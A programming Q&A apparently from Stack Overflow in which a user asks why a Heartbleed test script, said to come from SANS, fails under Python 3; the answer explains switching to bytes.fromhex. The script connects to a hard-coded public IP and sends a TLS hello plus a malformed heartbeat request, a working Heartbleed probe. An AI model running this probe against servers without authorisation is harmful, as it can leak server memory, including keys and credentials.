# Decode error with heartbleed python scirpt

Tags: python, python-3.x, encode

I was looking for hertbleed ssl vulnerability  online and came up with a simple code online from Sans:

```
import socket
sh=socket.socket()
sh.connect(("54.217.122.251",443))
sh.send("16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd6c181a2460dc4967c2fd960000040033c01101000000".decode('hex'))
helloresponse=sh.recv(8196)
sh.send("1803020003014000".decode('hex'))
data=sh.recv(8196)
```

This code simply sends a Hello message in the decoded format using python decode to SSL server to find if the server is vulnerable to Heartbleed vulnerability. But when i run this code in python 3.7 it shows an error as follows :

```
sh.send("16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd6c181a2460dc4967c2fd960000040033c01101000000".decode('hex'))

AttributeError: 'str' object has no attribute 'decode'
```

NOTE: Try using another IP address and not the one used in this

Answer (score 1):

Decoding `str` values from hex worked in Python 2:

```
>>> "1803020003014000".decode('hex')
'\x18\x03\x02\x00\x03\x01@\x00'
```

In Python 3, you want to use [bytes.fromhex](https://docs.python.org/3/library/stdtypes.html#bytes.fromhex):

```
>>> bytes.fromhex("1803020003014000")
b'\x18\x03\x02\x00\x03\x01@\x00'
```

Comment: could you please elaborate where do i need to make the changes